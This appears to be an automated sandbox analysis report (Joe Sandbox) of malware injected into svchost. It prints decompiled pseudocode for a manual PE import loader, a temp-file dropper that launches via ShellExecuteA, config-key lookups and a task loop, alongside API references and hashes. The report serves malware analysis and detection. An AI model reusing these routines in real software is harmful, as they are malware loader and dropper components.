                                                                                                                                  0x02514300
                                                                                                                                  0x025143bb
                                                                                                                                  0x00000000
                                                                                                                                  0x02514318
                                                                                                                                  0x02514322
                                                                                                                                  0x0251432c
                                                                                                                                  0x02514333
                                                                                                                                  0x02514336
                                                                                                                                  0x02514342
                                                                                                                                  0x02514345
                                                                                                                                  0x02514350
                                                                                                                                  0x02514359
                                                                                                                                  0x0251435f
                                                                                                                                  0x02514366
                                                                                                                                  0x02514371
                                                                                                                                  0x02514375
                                                                                                                                  0x02514368
                                                                                                                                  0x02514368
                                                                                                                                  0x02514368
                                                                                                                                  0x02514384
                                                                                                                                  0x0251438a
                                                                                                                                  0x0251439a
                                                                                                                                  0x025143ab
                                                                                                                                  0x025143ae
                                                                                                                                  0x025143b5
                                                                                                                                  0x00000000
                                                                                                                                  0x025143b5
                                                                                                                                  0x02514300
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,025198FD,00000001,00000100,025222F8,0251A3C7), ref: 02514290
                                                                                                                                  • CloseHandle.KERNEL32(0251A3C7), ref: 025143AB
                                                                                                                                  • CloseHandle.KERNEL32(00000001), ref: 025143AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreateEvent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1371578007-0
                                                                                                                                  • Opcode ID: 9cef289063de6c64f0c8d759e5726093bf703693133acf0eb0958b4f52f5ad53
                                                                                                                                  • Instruction ID: 45262c41699d18bc20f3e71e1a91d5273a314fc368bcfdf4caa7f418582798d4
                                                                                                                                  • Opcode Fuzzy Hash: 9cef289063de6c64f0c8d759e5726093bf703693133acf0eb0958b4f52f5ad53
                                                                                                                                  • Instruction Fuzzy Hash: 26419D7180020ABAEF10ABA1DD85FAFBFB9FF40324F105955F614A21C0D7348695DBA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02516069 Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02516069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0251EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0251EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}
























                                                                                                                                  0x02516071
                                                                                                                                  0x02516074
                                                                                                                                  0x0251607c
                                                                                                                                  0x0251607c
                                                                                                                                  0x02516082
                                                                                                                                  0x02516087
                                                                                                                                  0x02516099
                                                                                                                                  0x0251609c
                                                                                                                                  0x025160a2
                                                                                                                                  0x025160a4
                                                                                                                                  0x025161b2
                                                                                                                                  0x00000000
                                                                                                                                  0x025161b5
                                                                                                                                  0x025160aa
                                                                                                                                  0x025160ad
                                                                                                                                  0x025160b5
                                                                                                                                  0x025160b5
                                                                                                                                  0x025160b8
                                                                                                                                  0x025160ba
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025160c3
                                                                                                                                  0x025160c9
                                                                                                                                  0x025160cc
                                                                                                                                  0x025160cf
                                                                                                                                  0x025161ae
                                                                                                                                  0x025161ae
                                                                                                                                  0x025161ae
                                                                                                                                  0x025161ae
                                                                                                                                  0x00000000
                                                                                                                                  0x025161ae
                                                                                                                                  0x025160d5
                                                                                                                                  0x025160d5
                                                                                                                                  0x025160d8
                                                                                                                                  0x025160da
                                                                                                                                  0x025160ee
                                                                                                                                  0x025160fa
                                                                                                                                  0x025160dc
                                                                                                                                  0x025160dc
                                                                                                                                  0x025160e7
                                                                                                                                  0x025160e7
                                                                                                                                  0x02516101
                                                                                                                                  0x02516104
                                                                                                                                  0x02516106
                                                                                                                                  0x00000000
                                                                                                                                  0x0251610c
                                                                                                                                  0x0251610c
                                                                                                                                  0x02516112
                                                                                                                                  0x02516115
                                                                                                                                  0x02516118
                                                                                                                                  0x0251611b
                                                                                                                                  0x0251611d
                                                                                                                                  0x0251612d
                                                                                                                                  0x0251612d
                                                                                                                                  0x0251612f
                                                                                                                                  0x0251611f
                                                                                                                                  0x0251611f
                                                                                                                                  0x02516127
                                                                                                                                  0x02516127
                                                                                                                                  0x02516131
                                                                                                                                  0x02516133
                                                                                                                                  0x02516135
                                                                                                                                  0x0251618b
                                                                                                                                  0x0251618b
                                                                                                                                  0x0251618f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516191
                                                                                                                                  0x0251619e
                                                                                                                                  0x025161a4
                                                                                                                                  0x025161a6
                                                                                                                                  0x025160b2
                                                                                                                                  0x00000000
                                                                                                                                  0x025160b2
                                                                                                                                  0x00000000
                                                                                                                                  0x02516137
                                                                                                                                  0x02516137
                                                                                                                                  0x0251613a
                                                                                                                                  0x0251613d
                                                                                                                                  0x0251613f
                                                                                                                                  0x0251613f
                                                                                                                                  0x0251615e
                                                                                                                                  0x02516164
                                                                                                                                  0x02516166
                                                                                                                                  0x02516173
                                                                                                                                  0x02516173
                                                                                                                                  0x02516176
                                                                                                                                  0x0251617a
                                                                                                                                  0x02516187
                                                                                                                                  0x02516187
                                                                                                                                  0x02516187
                                                                                                                                  0x00000000
                                                                                                                                  0x02516187
                                                                                                                                  0x00000000
                                                                                                                                  0x0251617a
                                                                                                                                  0x02516168
                                                                                                                                  0x0251616b
                                                                                                                                  0x0251616e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516170
                                                                                                                                  0x02516170
                                                                                                                                  0x00000000
                                                                                                                                  0x02516170
                                                                                                                                  0x0251614a
                                                                                                                                  0x02516150
                                                                                                                                  0x00000000
                                                                                                                                  0x0251617c
                                                                                                                                  0x0251617c
                                                                                                                                  0x0251617f
                                                                                                                                  0x02516181
                                                                                                                                  0x02516181
                                                                                                                                  0x00000000
                                                                                                                                  0x02516185
                                                                                                                                  0x02516135
                                                                                                                                  0x02516106
                                                                                                                                  0x00000000
                                                                                                                                  0x025160b5
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,025164CF,00000000), ref: 0251609C
                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,025164CF,00000000), ref: 025160C3
                                                                                                                                  • GetProcAddress.KERNEL32(?,00000014), ref: 0251614A
                                                                                                                                  • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0251619E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Read$AddressLibraryLoadProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438460464-0
                                                                                                                                  • Opcode ID: dfc91dbc714e26fe69cf5d1a1e43a324d86a16cda3095d01085f7442503c3416
                                                                                                                                  • Instruction ID: 6907079b6d1c2ee8ce286b5a15880ec1502706525a7a5a3e7be7c839fc78dbfc
                                                                                                                                  • Opcode Fuzzy Hash: dfc91dbc714e26fe69cf5d1a1e43a324d86a16cda3095d01085f7442503c3416
                                                                                                                                  • Instruction Fuzzy Hash: 03418E71E40206EFEB24CF58C884BAABBBDFF54358F148469E815D7291E730E954CB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02512923 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                  			E02512923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E02512816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0251EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E02512871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0251EE2A(_t76, _t80, 0, 0x124);
							E0251EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}




























                                                                                                                                  0x02512923
                                                                                                                                  0x02512931
                                                                                                                                  0x02512932
                                                                                                                                  0x02512935
                                                                                                                                  0x0251293b
                                                                                                                                  0x02512950
                                                                                                                                  0x02512957
                                                                                                                                  0x0251296a
                                                                                                                                  0x0251296e
                                                                                                                                  0x02512970
                                                                                                                                  0x02512973
                                                                                                                                  0x02512978
                                                                                                                                  0x02512a5b
                                                                                                                                  0x02512a5b
                                                                                                                                  0x02512a5e
                                                                                                                                  0x00000000
                                                                                                                                  0x02512a5e
                                                                                                                                  0x0251297e
                                                                                                                                  0x02512995
                                                                                                                                  0x025129ac
                                                                                                                                  0x025129ae
                                                                                                                                  0x025129b1
                                                                                                                                  0x025129b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025129c1
                                                                                                                                  0x025129ca
                                                                                                                                  0x025129d6
                                                                                                                                  0x025129e0
                                                                                                                                  0x025129e2
                                                                                                                                  0x025129e6
                                                                                                                                  0x025129ee
                                                                                                                                  0x025129f4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512a0a
                                                                                                                                  0x02512a0e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512a18
                                                                                                                                  0x02512a2a
                                                                                                                                  0x02512a33
                                                                                                                                  0x02512a36
                                                                                                                                  0x02512a38
                                                                                                                                  0x02512a3b
                                                                                                                                  0x02512a3e
                                                                                                                                  0x02512a43
                                                                                                                                  0x02512a4a
                                                                                                                                  0x02512a45
                                                                                                                                  0x02512a45
                                                                                                                                  0x02512a45
                                                                                                                                  0x02512a4c
                                                                                                                                  0x02512a55
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512a55
                                                                                                                                  0x00000000
                                                                                                                                  0x0251297e
                                                                                                                                  0x02512959
                                                                                                                                  0x00000000
                                                                                                                                  0x02512959
                                                                                                                                  0x00000000

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2e164b4536968f4af3d02d26a3c48d4ba88b56a56852dede5e317c5226fa0cab
                                                                                                                                  • Instruction ID: 6aec2cab50541321a94c51acac39536ceebf3a9e06b493bc7cc198c2bb23c7b7
                                                                                                                                  • Opcode Fuzzy Hash: 2e164b4536968f4af3d02d26a3c48d4ba88b56a56852dede5e317c5226fa0cab
                                                                                                                                  • Instruction Fuzzy Hash: F1319371A00329ABEB219FA9CC81BBEB7F4FF88701F10445AE945E6285E374D651CB58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02519145 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                  			E02519145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E02512544(0x25222f8,  &E025207A8, 0x66, 0xe4, 0xc8));
				E0251EE2A(_t23, 0x25222f8, 0, 0x100);
				_t20 = E02519064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}









                                                                                                                                  0x02519145
                                                                                                                                  0x02519166
                                                                                                                                  0x02519174
                                                                                                                                  0x0251917a
                                                                                                                                  0x02519180
                                                                                                                                  0x02519181
                                                                                                                                  0x025191a9
                                                                                                                                  0x025191b6
                                                                                                                                  0x025191c9
                                                                                                                                  0x025191d3
                                                                                                                                  0x00000000
                                                                                                                                  0x025191e1
                                                                                                                                  0x025191ea

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,025222F8), ref: 0251915F
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 02519166
                                                                                                                                  • CharToOemA.USER32 ref: 02519174
                                                                                                                                  • wsprintfA.USER32 ref: 025191A9
                                                                                                                                    • Part of subcall function 02519064: GetTempPathA.KERNEL32(00000400,?,00000000,025222F8), ref: 0251907B
                                                                                                                                    • Part of subcall function 02519064: wsprintfA.USER32 ref: 025190E9
                                                                                                                                    • Part of subcall function 02519064: CreateFileA.KERNEL32(025222F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0251910E
                                                                                                                                    • Part of subcall function 02519064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 02519122
                                                                                                                                    • Part of subcall function 02519064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0251912D
                                                                                                                                    • Part of subcall function 02519064: CloseHandle.KERNEL32(00000000), ref: 02519134
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 025191E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3857584221-0
                                                                                                                                  • Opcode ID: c95c0c9e80a82663b236f5a78d68ff0aa1c2107baa0807f33ae1b3f60e0731e0
                                                                                                                                  • Instruction ID: 40a038f3b2f0163f61e968d0bf924119dbb897c4f675f885bbcbea8c48d298b3
                                                                                                                                  • Opcode Fuzzy Hash: c95c0c9e80a82663b236f5a78d68ff0aa1c2107baa0807f33ae1b3f60e0731e0
                                                                                                                                  • Instruction Fuzzy Hash: 0E0184F68401697BE7309A518C89FDF3B7CEB96B01F010091BB05E10C0D670968D8F74
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02512419 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02512419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}









                                                                                                                                  0x02512429
                                                                                                                                  0x0251242b
                                                                                                                                  0x0251242e
                                                                                                                                  0x02512434
                                                                                                                                  0x02512436
                                                                                                                                  0x0251243b
                                                                                                                                  0x02512474
                                                                                                                                  0x02512474
                                                                                                                                  0x0251243d
                                                                                                                                  0x0251243d
                                                                                                                                  0x02512440
                                                                                                                                  0x02512442
                                                                                                                                  0x02512446
                                                                                                                                  0x0251244c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251246b
                                                                                                                                  0x02512472
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512472
                                                                                                                                  0x0251247b
                                                                                                                                  0x0251247b
                                                                                                                                  0x02512476
                                                                                                                                  0x0251247a

                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,02512491,?,?,?,0251E844,-00000030,?,?,?,00000001), ref: 02512429
                                                                                                                                  • lstrlenA.KERNEL32(?,?,02512491,?,?,?,0251E844,-00000030,?,?,?,00000001,02511E3D,00000001,localcfg,lid_file_upd), ref: 0251243E
                                                                                                                                  • lstrcmpiA.KERNEL32(?,?,?,02512491,?,?,?,0251E844,-00000030,?,?,?,00000001,02511E3D,00000001,localcfg), ref: 02512452
                                                                                                                                  • lstrlenA.KERNEL32(?,?,02512491,?,?,?,0251E844,-00000030,?,?,?,00000001,02511E3D,00000001,localcfg,lid_file_upd), ref: 02512467
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$lstrcmpi
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 1808961391-1857712256
                                                                                                                                  • Opcode ID: bba383d6e2fa0158c626cd8dc3d31dc825cc2cb5121a70f0ab7a94479f897969
                                                                                                                                  • Instruction ID: 978fa5fdd9236ebb0c9d4b9cb5029932843096da052559e898e18c5042f71e1f
                                                                                                                                  • Opcode Fuzzy Hash: bba383d6e2fa0158c626cd8dc3d31dc825cc2cb5121a70f0ab7a94479f897969
                                                                                                                                  • Instruction Fuzzy Hash: 6F011A31601228AFDF11EF69CC819DE7BA9FF44354B01C425ED59D7200E370EA54CA98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02518CEE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E02518CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;
				void* _t49;

				_push(_t34);
				_t31 = 0;
				_t49 =  *0x2523380 - _t31; // 0x0
				if(_t49 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x2523388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x2523380; // 0x0
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x2523388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x2523300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0251A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0251A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
					goto L16;
				}
			}

















                                                                                                                                  0x02518cf2
                                                                                                                                  0x02518cf4
                                                                                                                                  0x02518cf6
                                                                                                                                  0x02518cfc
                                                                                                                                  0x02518dae
                                                                                                                                  0x02518db0
                                                                                                                                  0x02518db0
                                                                                                                                  0x02518d08
                                                                                                                                  0x02518d13
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518d1b
                                                                                                                                  0x02518d21
                                                                                                                                  0x02518d24
                                                                                                                                  0x02518d27
                                                                                                                                  0x02518d2a
                                                                                                                                  0x02518d2f
                                                                                                                                  0x02518da1
                                                                                                                                  0x02518da1
                                                                                                                                  0x02518da8
                                                                                                                                  0x00000000
                                                                                                                                  0x02518d31
                                                                                                                                  0x02518d31
                                                                                                                                  0x02518d34
                                                                                                                                  0x02518d37
                                                                                                                                  0x02518d3c
                                                                                                                                  0x02518d50
                                                                                                                                  0x02518d6c
                                                                                                                                  0x02518d6f
                                                                                                                                  0x02518d78
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518d7a
                                                                                                                                  0x02518d7d
                                                                                                                                  0x02518d8b
                                                                                                                                  0x02518d8b
                                                                                                                                  0x02518d90
                                                                                                                                  0x02518d9e
                                                                                                                                  0x02518da0
                                                                                                                                  0x00000000
                                                                                                                                  0x02518d90
                                                                                                                                  0x00000000
                                                                                                                                  0x02518d7d
                                                                                                                                  0x02518d5a
                                                                                                                                  0x02518d5f
                                                                                                                                  0x02518d62
                                                                                                                                  0x02518d67
                                                                                                                                  0x02518d67
                                                                                                                                  0x02518d67
                                                                                                                                  0x00000000
                                                                                                                                  0x02518d62
                                                                                                                                  0x02518d46
                                                                                                                                  0x00000000
                                                                                                                                  0x02518d7f
                                                                                                                                  0x02518d7f
                                                                                                                                  0x02518d83
                                                                                                                                  0x02518d84
                                                                                                                                  0x00000000
                                                                                                                                  0x02518d89

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 536389180-2166502722
                                                                                                                                  • Opcode ID: d69835de5f6421f47679afc906bbb1c330a575833eb7414b2782c3ca7486f58f
                                                                                                                                  • Instruction ID: 2e151c821f0d598d3d8df96e298c3371b6cae48d9fa1a66758780671d330e971
                                                                                                                                  • Opcode Fuzzy Hash: d69835de5f6421f47679afc906bbb1c330a575833eb7414b2782c3ca7486f58f
                                                                                                                                  • Instruction Fuzzy Hash: F521C332A10715AFFB309F74D98866A7BB9FF61254B2A04D9D401D7141CB34E948CB58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251BFCE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0251C057
